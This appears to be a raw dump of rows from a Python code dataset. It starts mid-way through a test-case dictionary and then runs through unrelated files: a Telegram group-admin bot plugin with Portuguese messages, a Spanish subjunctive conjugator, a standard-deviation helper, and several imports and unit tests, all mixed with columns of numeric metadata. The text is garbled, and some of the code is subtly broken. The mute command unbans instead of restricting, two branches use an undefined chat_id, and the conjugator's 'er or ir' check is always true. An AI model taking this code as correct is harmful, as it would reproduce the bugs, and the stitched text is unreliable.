k-j-i-h-g-f-e-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t------\n----t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t----\n--t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-c-b-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t--\nt-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-c-b-a-b-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t\n--t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-c-b-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t--\n----t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t----\n------t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t------\n--------t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t--------\n----------t-s-r-q-p-o-n-m-l-k-j-i-h-g-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t----------\n------------t-s-r-q-p-o-n-m-l-k-j-i-h-g-h-i-j-k-l-m-n-o-p-q-r-s-t------------\n--------------t-s-r-q-p-o-n-m-l-k-j-i-h-i-j-k-l-m-n-o-p-q-r-s-t--------------\n----------------t-s-r-q-p-o-n-m-l-k-j-i-j-k-l-m-n-o-p-q-r-s-t----------------\n------------------t-s-r-q-p-o-n-m-l-k-j-k-l-m-n-o-p-q-r-s-t------------------\n--------------------t-s-r-q-p-o-n-m-l-k-l-m-n-o-p-q-r-s-t--------------------\n----------------------t-s-r-q-p-o-n-m-l-m-n-o-p-q-r-s-t----------------------\n------------------------t-s-r-q-p-o-n-m-n-o-p-q-r-s-t------------------------\n--------------------------t-s-r-q-p-o-n-o-p-q-r-s-t--------------------------\n----------------------------t-s-r-q-p-o-p-q-r-s-t----------------------------\n------------------------------t-s-r-q-p-q-r-s-t------------------------------\n--------------------------------t-s-r-q-r-s-t--------------------------------\n----------------------------------t-s-r-s-t----------------------------------\n------------------------------------t-s-t------------------------------------\n--------------------------------------t--------------------------------------']
],
4: [
[tuple(),1918080160]
],
5: [
[tuple(),38182]
],
6: [
[ ([[]],0,[0 for i in range(10)]), [[]] ],
[ ([[1]],0,[0 for i in range(10)]), [[1]] ],
[ ([[1]],5,[0 for i in range(10)]), [[1]] ],
[ ([[1]],5,[1 for i in range(10)]), [[6]] ],
[ ([[1,1,0,0,1,0,0,1,2,0]],4,[-1,3,0,1,3,-2,0,0,0,0]), [[1, 4, 6, 6, 7, 6, 6, 4, 5, 3]] ],
[ ([[1,1,0,0,1,0,0,1,2,0]],8,[-1,3,0,1,3,-2,0,0,0,0]), [[1, 8, 10, 10, 11, 10, 10, 8, 9, 3]] ],
[ ([[1,1,0,0,1,0,0,1,2,0]],3,[-2,-1,0,1,3,-2,0,0,-4,0]), [[1, 1, 0, 0, 0, 0, 0, 1, 2, 0]] ],
[ ([[1,1],[1,1],[0,0],[0,1],[1,0],[0,9],[0,500],[1,2],[2,432],[0,2]],5,[-2,-1,0,1,3,-2,-10,-10,-4,-10]), [[7, 7],[0, 0],[0, 0],[0, 0],[0, 0],[0, 0],[12, 512],[0, 0],[0, 412],[9, 11]] ],
[ ([[0,1,3,0],[1,0,0,0]],3,[-1,-1,0,1,3,0,0,0,0,0]), [[4, 5, 7, 0], [5, 4, 4, 0]] ],
[ ([[0,1,3,0],[1,0,0,0]],7,[-1,-1,0,1,3,0,0,0,0,0]), [[16, 5, 19, 0], [17, 4, 16, 0]] ],
[ ([[0,1,3,0],[1,0,0,0]],7,[2,-1,0,1,3,0,0,-1,0,2]), [[16, 5, 19, 0], [17, 4, 16, 0]] ],
[ ([[0,0,1,0,2,3],[0,1,0,0,1,0],[0,0,1,2,0,1],[0,4,2,0,2,3]],1,[-1,3,0,1,3,-2,0,0,0,0]), [[3, 0, 1, 1, 3, 4],[3, 2, 3, 0, 0, 3],[0, 3, 0, 0, 0, 4],[3, 5, 5, 3, 5, 4]] ],
[ ([[0,0,1,0,2,3],[0,1,0,0,1,0],[0,0,1,2,0,1],[0,4,2,0,2,3]],5,[-1,3,0,1,3,-2,0,0,0,0]), [[7, 3, 1, 1, 5, 8],[15, 0, 0, 6, 0, 15],[0, 3, 0, 3, 0, 16],[7, 17, 2, 13, 2, 8]] ],
[ ([[0,3,11,8,6,7,0,3,9,7],
[0,0,13,4,6,3,3,1,4,9],
[6,10,4,0,0,4,3,5,0,10],
[0,5,0,0,1,1,1,4,0,2],
[3,0,3,7,5,5,8,3,2,7],
[4,0,7,0,0,11,3,2,0,3],
[1,0,3,1,3,3,9,9,9,2],
[3,8,0,5,0,0,0,7,4,6],
[0,0,0,0,5,3,5,0,8,3],
[1,0,7,6,11,8,5,0,2,9]], 5, [-3,0,-2,1,-1,0,-1,3,-2,2,-3]),
[[0,0,8,3,1,6,0,2,4,2],
[0,12,13,19,21,14,0,1,10,5],
[3,6,1,0,0,0,7,8,0,8],
[0,0,0,0,0,0,1,11,0,0],
[8,0,2,3,0,11,12,11,2,6],
[3,0,4,7,7,13,5,9,9,0],
[0,0,0,9,11,0,16,10,12,0],
[6,3,1,4,0,0,0,13,4,4],
[3,0,0,0,2,0,4,6,20,0],
[0,0,0,1,9,5,1,1,0,7]] ]
]
}
| 134.217391
| 3,110
| 0.292085
| 2,293
| 9,261
| 1.179241
| 0.044919
| 0.076183
| 0.06324
| 0.075444
| 0.717456
| 0.693417
| 0.684541
| 0.667899
| 0.656805
| 0.632027
| 0
| 0.088476
| 0.1042
| 9,261
| 68
| 3,111
| 136.191176
| 0.237464
| 0.027643
| 0
| 0.079365
| 0
| 0.063492
| 0.687083
| 0.670965
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1db150f4ceb3460b018f4a6e6f49091eda8ad8dd
| 17,393
|
py
|
Python
|
plugins/admins.py
|
Sunda001/EduuRobot
|
9b077c8bf8e3900f5417f14375b5a30b551135f8
|
[
"MIT"
] | null | null | null |
plugins/admins.py
|
Sunda001/EduuRobot
|
9b077c8bf8e3900f5417f14375b5a30b551135f8
|
[
"MIT"
] | null | null | null |
plugins/admins.py
|
Sunda001/EduuRobot
|
9b077c8bf8e3900f5417f14375b5a30b551135f8
|
[
"MIT"
] | null | null | null |
import config
from amanobot.namedtuple import InlineKeyboardMarkup
from amanobot.exception import TelegramError, NotEnoughRightsError
bot = config.bot
bot_id = config.bot_id
sudos = config.sudoers
def isAdmin(chat_id, user_id, reply_id=None):
adms = bot.getChatAdministrators(chat_id)
adm_id = []
dic = {}
for ids in adms:
adm_id.append(ids['user']['id'])
if user_id in adm_id or user_id in sudos:
dic['user'] = True
else:
dic['user'] = False
if reply_id in adm_id:
dic['reply'] = True
else:
dic['reply'] = False
if bot_id in adm_id:
dic['bot'] = True
else:
dic['bot'] = False
return dic
def admins(msg):
if msg.get('text'):
if msg['text'].split()[0] == '/ban' or msg['text'].split()[0] == '!ban':
if msg['chat']['type'] == 'private':
bot.sendMessage(msg['chat']['id'], 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
else:
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['from']['id']
reply_name = msg['reply_to_message']['from']['first_name']
elif len(msg['text'].split()) > 1:
u_id = msg['text'].split()[1]
try:
get = bot.getChat(u_id)
reply_id = get['id']
reply_name = get['first_name']
except:
bot.sendMessage(msg['chat']['id'],
'ID inválida ou desconhecida. use nesse formato: /ban ID do usuário',
reply_to_message_id=msg['message_id'])
return
else:
reply_id = None
adm = isAdmin(msg['chat']['id'], msg['from']['id'], reply_id)
if adm['user']:
try:
int(reply_id)
except:
return bot.sendMessage(msg['chat']['id'], 'Responda alguém ou informe sua ID',
reply_to_message_id=msg['message_id'])
if adm['bot']:
if adm['reply']:
bot.sendMessage(msg['chat']['id'], 'Esse aí tem admin',
reply_to_message_id=msg['message_id'])
else:
bot.kickChatMember(msg['chat']['id'], reply_id)
bot.sendMessage(msg['chat']['id'], '{} baniu {}!'.format(
msg['from']['first_name'],
reply_name
),
reply_to_message_id=msg['message_id'])
else:
bot.sendMessage(msg['chat']['id'], 'Ei, eu nao tenho admin aqui',
reply_to_message_id=msg['message_id'])
elif msg['text'].split()[0] == '/kick' or msg['text'].split()[0] == '!kick':
if msg['chat']['type'] == 'private':
bot.sendMessage(msg['chat']['id'], 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
else:
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['from']['id']
reply_name = msg['reply_to_message']['from']['first_name']
elif len(msg['text'].split()) > 1:
u_id = msg['text'].split()[1]
try:
get = bot.getChat(u_id)
reply_id = get['id']
reply_name = get['first_name']
except:
bot.sendMessage(msg['chat']['id'],
'ID inválida ou desconhecida. use nesse formato: /kick ID do usuário',
reply_to_message_id=msg['message_id'])
return
else:
reply_id = None
adm = isAdmin(msg['chat']['id'], msg['from']['id'], reply_id)
if adm['user']:
try:
int(reply_id)
except:
return bot.sendMessage(msg['chat']['id'], 'Responda alguém ou informe sua ID',
reply_to_message_id=msg['message_id'])
if adm['bot']:
if adm['reply']:
bot.sendMessage(msg['chat']['id'], 'Esse aí tem admin',
reply_to_message_id=msg['message_id'])
else:
bot.unbanChatMember(msg['chat']['id'], reply_id)
bot.sendMessage(msg['chat']['id'], '{} kickou {}!'.format(
msg['from']['first_name'],
reply_name),
reply_to_message_id=msg['message_id'])
else:
bot.sendMessage(msg['chat']['id'], 'Ei, eu nao tenho admin aqui',
reply_to_message_id=msg['message_id'])
elif msg['text'].split()[0] == '/mute' or msg['text'].split()[0] == '!mute':
if msg['chat']['type'] == 'private':
bot.sendMessage(msg['chat']['id'], 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
else:
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['from']['id']
reply_name = msg['reply_to_message']['from']['first_name']
elif len(msg['text'].split()) > 1:
u_id = msg['text'].split()[1]
try:
get = bot.getChat(u_id)
reply_id = get['id']
reply_name = get['first_name']
except:
bot.sendMessage(msg['chat']['id'],
'ID inválida ou desconhecida. use nesse formato: /mute ID do usuário',
reply_to_message_id=msg['message_id'])
return
else:
reply_id = None
adm = isAdmin(msg['chat']['id'], msg['from']['id'], reply_id)
if adm['user']:
try:
int(reply_id)
except:
return bot.sendMessage(msg['chat']['id'], 'Responda alguém ou informe sua ID',
reply_to_message_id=msg['message_id'])
if adm['bot']:
if adm['reply']:
bot.sendMessage(msg['chat']['id'], 'Esse aí tem admin',
reply_to_message_id=msg['message_id'])
else:
bot.unbanChatMember(msg['chat']['id'], reply_id)
bot.sendMessage(msg['chat']['id'], '{} restringiu {}!'.format(
msg['from']['first_name'],
reply_name),
reply_to_message_id=msg['message_id'])
else:
bot.sendMessage(msg['chat']['id'], 'Ei, eu nao tenho admin aqui',
reply_to_message_id=msg['message_id'])
elif msg['text'].split()[0] == '/unmute' or msg['text'].split()[0] == '!unmute':
if msg['chat']['type'] == 'private':
bot.sendMessage(msg['chat']['id'], 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
else:
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['from']['id']
reply_name = msg['reply_to_message']['from']['first_name']
elif len(msg['text'].split()) > 1:
u_id = msg['text'].split()[1]
try:
get = bot.getChat(u_id)
reply_id = get['id']
reply_name = get['first_name']
except Exception as e:
bot.sendMessage(msg['chat']['id'],
'ID inválida ou desconhecida. use nesse formato: /unban ID do usuário',
reply_to_message_id=msg['message_id'])
return
else:
reply_id = None
adm = isAdmin(msg['chat']['id'], msg['from']['id'], reply_id)
if adm['user']:
try:
int(reply_id)
except:
return bot.sendMessage(msg['chat']['id'], 'Responda alguém ou informe sua ID',
reply_to_message_id=msg['message_id'])
if adm['bot']:
if adm['reply']:
bot.sendMessage(msg['chat']['id'], 'Esse aí tem admin',
reply_to_message_id=msg['message_id'])
else:
bot.restrictChatMember(chat_id, reply_id,
can_send_messages=True,
can_send_media_messages=True,
can_send_other_messages=True,
can_add_web_page_previews=True)
bot.sendMessage(msg['chat']['id'], '{} agora pode falar aqui!'.format(reply_name),
reply_to_message_id=msg['message_id'])
else:
bot.sendMessage(msg['chat']['id'], 'Ei, eu nao tenho admin aqui',
reply_to_message_id=msg['message_id'])
elif msg['text'].split()[0] == '/unban' or msg['text'].split()[0] == '!unban':
if msg['chat']['type'] == 'private':
bot.sendMessage(msg['chat']['id'], 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
else:
if msg.get('reply_to_message'):
reply_id = msg['reply_to_message']['from']['id']
reply_name = msg['reply_to_message']['from']['first_name']
elif len(msg['text'].split()) > 1:
u_id = msg['text'].split()[1]
try:
get = bot.getChat(u_id)
reply_id = get['id']
reply_name = get['first_name']
except Exception as e:
bot.sendMessage(msg['chat']['id'],
'ID inválida ou desconhecida. use nesse formato: /unban ID do usuário',
reply_to_message_id=msg['message_id'])
return
else:
reply_id = None
adm = isAdmin(msg['chat']['id'], msg['from']['id'], reply_id)
if adm['user']:
try:
int(reply_id)
except:
return bot.sendMessage(msg['chat']['id'], 'Responda alguém ou informe sua ID',
reply_to_message_id=msg['message_id'])
if adm['bot']:
if adm['reply']:
bot.sendMessage(msg['chat']['id'], 'Esse aí tem admin',
reply_to_message_id=msg['message_id'])
else:
bot.unbanChatMember(msg['chat']['id'], reply_id)
bot.sendMessage(msg['chat']['id'], '{} desbaniu {}!'.format(
msg['from']['first_name'],
reply_name),
reply_to_message_id=msg['message_id'])
else:
bot.sendMessage(msg['chat']['id'], 'Ei, eu nao tenho admin aqui',
reply_to_message_id=msg['message_id'])
elif msg['text'].split()[0] == '/pin' or msg['text'].split()[0] == '!pin':
if msg['chat']['type'] == 'private':
bot.sendMessage(msg['chat']['id'], 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
elif isAdmin(msg['chat']['id'], msg['from']['id'])['user']:
if msg.get('reply_to_message'):
bot.pinChatMessage(msg['chat']['id'], msg['reply_to_message']['message_id'])
bot.sendMessage(msg['chat']['id'], 'Mensagem fixada',
reply_to_message_id=msg['message_id'])
else:
bot.sendMessage(msg['chat']['id'], 'Responda a uma mensagem para eu fixar.',
reply_to_message_id=msg['message_id'])
elif msg['text'].split()[0] == '/unpin' or msg['text'].split()[0] == '!unpin':
if msg['chat']['type'] == 'private':
bot.sendMessage(msg['chat']['id'], 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
elif isAdmin(msg['chat']['id'], msg['from']['id'])['user']:
bot.unpinChatMessage(msg['chat']['id'])
bot.sendMessage(msg['chat']['id'], 'Mensagem desfixada',
reply_to_message_id=msg['message_id'])
elif msg['text'].startswith('/title') or msg['text'].startswith('!title'):
text = msg['text'][7:]
if msg['chat']['type'] == 'private':
bot.sendMessage(chat_id, 'Este comando só funciona em grupos ¯\\_(ツ)_/¯')
elif isAdmin(msg['chat']['id'], msg['from']['id'])['user']:
if text == '':
bot.sendMessage(msg['chat']['id'], 'Uso: /title titulo do grupo',
reply_to_message_id=msg['message_id'])
else:
try:
bot.setChatTitle(msg['chat']['id'], text)
bot.sendMessage(msg['chat']['id'], 'O novo título do grupo foi definido com sucesso!',
reply_to_message_id=msg['message_id'])
except NotEnoughRightsError:
bot.sendMessage(msg['chat']['id'], 'Eu nao tenho tenho permissão para alterar as informações do grupo',
reply_to_message_id=msg['message_id'])
except:
bot.sendMessage(msg['chat']['id'], 'Ocorreu um erro.',
reply_to_message_id=msg['message_id'])
elif msg['text'] == '/config':
if isAdmin(msg['chat']['id'], msg['from']['id'])['user']:
kb = InlineKeyboardMarkup(inline_keyboard=[
[dict(text='⚙️ Opções do chat', callback_data='options {}'.format(msg['chat']['id']))],
[dict(text='🗑 Deletar mensagem', callback_data='del_msg')]
])
bot.sendMessage(msg['from']['id'], 'Menu de configuração do chat {}'.format(msg['chat']['title']),
reply_markup=kb)
bot.sendMessage(msg['chat']['id'], 'Enviei um menu de configurações no seu pv.',
reply_to_message_id=msg['message_id'])
return True
elif msg.get('data'):
if msg['data'].startswith('options'):
bot.answerCallbackQuery(msg['id'], 'Abrindo...')
if isAdmin(msg['data'].split()[1], msg['from']['id'])['user']:
info = bot.getChat(msg['data'].split()[1])
kb = InlineKeyboardMarkup(inline_keyboard=[
[dict(text='IA', callback_data='.'.format(msg['data'].split()[1]))] +
[dict(text='None', callback_data='IA {}'.format(msg['data'].split()[1]))],
[dict(text='Voltar', callback_data='back {}'.format(msg['data'].split()[1]))]
])
bot.editMessageText((msg['from']['id'], msg['message']['message_id']),
'Opções do chat {}'.format(info['title']),
reply_markup=kb)
elif msg['data'].startswith('back'):
info = bot.getChat(msg['data'].split()[1])
kb = InlineKeyboardMarkup(inline_keyboard=[
[dict(text='⚙️ Opções do chat', callback_data='options {}'.format(msg['data'].split()[1]))],
[dict(text='🗑 Deletar mensagem', callback_data='del_msg')]
])
bot.editMessageText((msg['from']['id'], msg['message']['message_id']),
'Menu de configuração do chat {}'.format(info['title']),
reply_markup=kb)
elif msg['data'] == 'del_msg':
bot.deleteMessage((msg['from']['id'], msg['message']['message_id']))
| 50.856725
| 127
| 0.428046
| 1,729
| 17,393
| 4.145171
| 0.098323
| 0.087903
| 0.071578
| 0.117204
| 0.827961
| 0.784847
| 0.770197
| 0.736431
| 0.721501
| 0.699316
| 0
| 0.003209
| 0.426608
| 17,393
| 341
| 128
| 51.005865
| 0.713226
| 0
| 0
| 0.731788
| 0
| 0
| 0.199908
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006623
| false
| 0
| 0.009934
| 0
| 0.056291
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1dbe549fb8095d0cef530c59aff7e02f26956f31
| 1,701
|
py
|
Python
|
src/spanishconjugator/tenses/subjunctive/future.py
|
shrutiichandra/spanish-conjugator
|
2ebf41b92c14c3e47a873c52fdf4ce1d17bff5e0
|
[
"MIT"
] | null | null | null |
src/spanishconjugator/tenses/subjunctive/future.py
|
shrutiichandra/spanish-conjugator
|
2ebf41b92c14c3e47a873c52fdf4ce1d17bff5e0
|
[
"MIT"
] | null | null | null |
src/spanishconjugator/tenses/subjunctive/future.py
|
shrutiichandra/spanish-conjugator
|
2ebf41b92c14c3e47a873c52fdf4ce1d17bff5e0
|
[
"MIT"
] | null | null | null |
# -*- coding: iso-8859-15 -*-
def subjunctive_future(root_verb, pronoun):
if pronoun == "yo":
if root_verb[-2:] == "ar":
conjugation = root_verb[:-2] + "are"
return conjugation
if root_verb[-2:] == "er" or "ir":
conjugation = root_verb[:-2] + "iere"
return conjugation
if pronoun == "tu":
if root_verb[-2:] == "ar":
conjugation = root_verb[:-2] + "ares"
return conjugation
if root_verb[-2:] == "er" or "ir":
conjugation = root_verb[:-2] + "ieres"
return conjugation
if pronoun == "usted":
if root_verb[-2:] == "ar":
conjugation = root_verb[:-2] + "are"
return conjugation
if root_verb[-2:] == "er" or "ir":
conjugation = root_verb[:-2] + "iere"
return conjugation
if pronoun == "nosotros":
if root_verb[-2:] == "ar":
conjugation = root_verb[:-2] + "áremos"
return conjugation
if root_verb[-2:] == "er" or "ir":
conjugation = root_verb[:-2] + "iéremos"
return conjugation
if pronoun == "vosotros":
if root_verb[-2:] == "ar":
conjugation = root_verb[:-2] + "areis"
return conjugation
if root_verb[-2:] == "er" or "ir":
conjugation = root_verb[:-2] + "iereis"
return conjugation
if pronoun == "ustedes":
if root_verb[-2:] == "ar":
conjugation = root_verb[:-2] + "aren"
return conjugation
if root_verb[-2:] == "er" or "ir":
conjugation = root_verb[:-2] + "ieren"
return conjugation
| 35.4375
| 52
| 0.495003
| 184
| 1,701
| 4.434783
| 0.184783
| 0.245098
| 0.264706
| 0.161765
| 0.720588
| 0.720588
| 0.720588
| 0.720588
| 0.720588
| 0.558824
| 0
| 0.027223
| 0.352146
| 1,701
| 48
| 53
| 35.4375
| 0.713249
| 0.015873
| 0
| 0.651163
| 0
| 0
| 0.074118
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0
| 0
| 0.302326
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
69937d97f07e4064b566f5bb032eae5baae11a2c
| 128
|
py
|
Python
|
src/sampleStatistics/sampleStandardDeviation.py
|
nickeita/su2021_is601_project2
|
4974a05517c7884751c5ece09177af2a7640f503
|
[
"MIT"
] | null | null | null |
src/sampleStatistics/sampleStandardDeviation.py
|
nickeita/su2021_is601_project2
|
4974a05517c7884751c5ece09177af2a7640f503
|
[
"MIT"
] | null | null | null |
src/sampleStatistics/sampleStandardDeviation.py
|
nickeita/su2021_is601_project2
|
4974a05517c7884751c5ece09177af2a7640f503
|
[
"MIT"
] | null | null | null |
from sampleStatistics.sampleVariance import sample_variance
def sample_std_deviation(a):
return sample_variance(a) ** 0.5
| 21.333333
| 59
| 0.804688
| 17
| 128
| 5.823529
| 0.764706
| 0.282828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017857
| 0.125
| 128
| 5
| 60
| 25.6
| 0.866071
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
69d5f2d420c1bcfe518623b05b2541418c15f14f
| 150
|
py
|
Python
|
ghostipy/spectral/__init__.py
|
kemerelab/ghostipy
|
e931e7553409e999c168074365a7700c8ff83171
|
[
"Apache-2.0"
] | 9
|
2021-07-28T09:29:55.000Z
|
2022-03-17T16:17:22.000Z
|
ghostipy/spectral/__init__.py
|
kemerelab/ghostipy
|
e931e7553409e999c168074365a7700c8ff83171
|
[
"Apache-2.0"
] | 5
|
2021-07-20T01:00:38.000Z
|
2022-01-27T00:06:17.000Z
|
ghostipy/spectral/__init__.py
|
kemerelab/ghostipy
|
e931e7553409e999c168074365a7700c8ff83171
|
[
"Apache-2.0"
] | 1
|
2022-02-04T22:59:52.000Z
|
2022-02-04T22:59:52.000Z
|
from ghostipy.spectral.mtm import *
from ghostipy.spectral.cwt import *
from ghostipy.spectral.wsst import *
from ghostipy.spectral.wavelets import *
| 30
| 40
| 0.813333
| 20
| 150
| 6.1
| 0.4
| 0.393443
| 0.655738
| 0.639344
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 150
| 4
| 41
| 37.5
| 0.910448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
69f59b051def9686d4205db451a108aabab1520b
| 3,109
|
py
|
Python
|
likelihoodprofiler/tests/test_get_endpoint.py
|
vetedde/lhp.py
|
fd73c1cd24ae66f2be89833ab3f6c9c7bae68a72
|
[
"MIT"
] | 2
|
2021-01-19T08:42:36.000Z
|
2021-01-20T09:23:22.000Z
|
likelihoodprofiler/tests/test_get_endpoint.py
|
vetedde/lhp.py
|
fd73c1cd24ae66f2be89833ab3f6c9c7bae68a72
|
[
"MIT"
] | 8
|
2019-12-26T17:31:28.000Z
|
2022-03-21T22:17:42.000Z
|
likelihoodprofiler/tests/test_get_endpoint.py
|
vetedde/lhp.py
|
fd73c1cd24ae66f2be89833ab3f6c9c7bae68a72
|
[
"MIT"
] | null | null | null |
from .. import get_endpoint
from .cases_func import f_3p_1im_dep
import math
import numpy as np
import unittest
method = "CICO_ONE_PASS"
class getEndpointTest(unittest.TestCase):
def test_default_options(self):
res0 = [get_endpoint(
[3., 2., 2.1],
i,
lambda x: f_3p_1im_dep(x),
method,
loss_crit=9
) for i in range(3)]
self.assertTrue(math.isclose(res0[0].value, 5.0, abs_tol=1e-2))
self.assertTrue(len(res0[0].profilePoints) > 0)
self.assertTrue(res0[0].status == "BORDER_FOUND_BY_SCAN_TOL")
self.assertTrue(res0[0].direction == "right")
self.assertTrue(math.isclose(res0[1].value, 2.0+2.0*math.sqrt(2.), abs_tol=1e-2))
self.assertTrue(len(res0[1].profilePoints) > 0)
self.assertTrue(res0[1].status == "BORDER_FOUND_BY_SCAN_TOL")
self.assertTrue(res0[1].direction == "right")
self.assertTrue(len(res0[2].profilePoints) == 0)
self.assertTrue(res0[2].status == "SCAN_BOUND_REACHED")
self.assertTrue(res0[2].direction == "right")
def test_left_direction(self):
res0 = [get_endpoint(
[3., 2., 2.1],
i,
lambda x: f_3p_1im_dep(x),
method,
direction="left",
loss_crit=9
) for i in range(3)]
self.assertTrue(math.isclose(res0[0].value, 1.0, abs_tol=1e-2))
self.assertTrue(len(res0[0].profilePoints) > 0)
self.assertTrue(res0[0].status == "BORDER_FOUND_BY_SCAN_TOL")
self.assertTrue(res0[0].direction == "left")
self.assertTrue(math.isclose(res0[1].value, 2.0 - 2.0 * math.sqrt(2.), abs_tol=1e-2))
self.assertTrue(len(res0[1].profilePoints) > 0)
self.assertTrue(res0[1].status == "BORDER_FOUND_BY_SCAN_TOL")
self.assertTrue(res0[1].direction == "left")
self.assertTrue(len(res0[2].profilePoints) == 0)
self.assertTrue(res0[2].status == "SCAN_BOUND_REACHED")
self.assertTrue(res0[2].direction == "left")
def test_log(self):
res0 = [get_endpoint(
[3., 2., 2.1],
i,
lambda x: f_3p_1im_dep(x),
method,
loss_crit=9,
scale=["log","direct", "log"]
) for i in range(3)]
self.assertTrue(math.isclose(np.log10(res0[0].value), np.log10(5.), abs_tol=1e-2))
self.assertTrue(len(res0[0].profilePoints) > 0)
self.assertTrue(res0[0].status == "BORDER_FOUND_BY_SCAN_TOL")
self.assertTrue(res0[0].direction == "right")
self.assertTrue(math.isclose(res0[1].value, 2.0 + 2.0 * math.sqrt(2.), abs_tol=1e-2))
self.assertTrue(len(res0[1].profilePoints) > 0)
self.assertTrue(res0[1].status == "BORDER_FOUND_BY_SCAN_TOL")
self.assertTrue(res0[1].direction == "right")
self.assertTrue(len(res0[2].profilePoints) == 0)
self.assertTrue(res0[2].status == "SCAN_BOUND_REACHED")
self.assertTrue(res0[2].direction == "right")
#unittest.main(argv=['first-arg-is-ignored'], exit=False)
| 38.382716
| 93
| 0.59955
| 426
| 3,109
| 4.2277
| 0.171362
| 0.256524
| 0.1799
| 0.104942
| 0.83176
| 0.83176
| 0.83176
| 0.83176
| 0.83176
| 0.811216
| 0
| 0.059473
| 0.242843
| 3,109
| 80
| 94
| 38.8625
| 0.705607
| 0.018012
| 0
| 0.69697
| 0
| 0
| 0.088139
| 0.047182
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.045455
| false
| 0.015152
| 0.075758
| 0
| 0.136364
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
69fefac90430bb34553f633516cbda99768c8180
| 113
|
py
|
Python
|
tests/test_all.py
|
jacobtomlinson/jupyterlab_iframe
|
d4caa1bda432582186824d7faf5b8f8c4f52fbc1
|
[
"Apache-2.0"
] | null | null | null |
tests/test_all.py
|
jacobtomlinson/jupyterlab_iframe
|
d4caa1bda432582186824d7faf5b8f8c4f52fbc1
|
[
"Apache-2.0"
] | null | null | null |
tests/test_all.py
|
jacobtomlinson/jupyterlab_iframe
|
d4caa1bda432582186824d7faf5b8f8c4f52fbc1
|
[
"Apache-2.0"
] | null | null | null |
# for Coverage
from jupyterlab_iframe.__init__ import *
from jupyterlab_iframe.extension import *
print('test')
| 18.833333
| 41
| 0.80531
| 14
| 113
| 6.071429
| 0.714286
| 0.329412
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115044
| 113
| 5
| 42
| 22.6
| 0.85
| 0.106195
| 0
| 0
| 0
| 0
| 0.040404
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
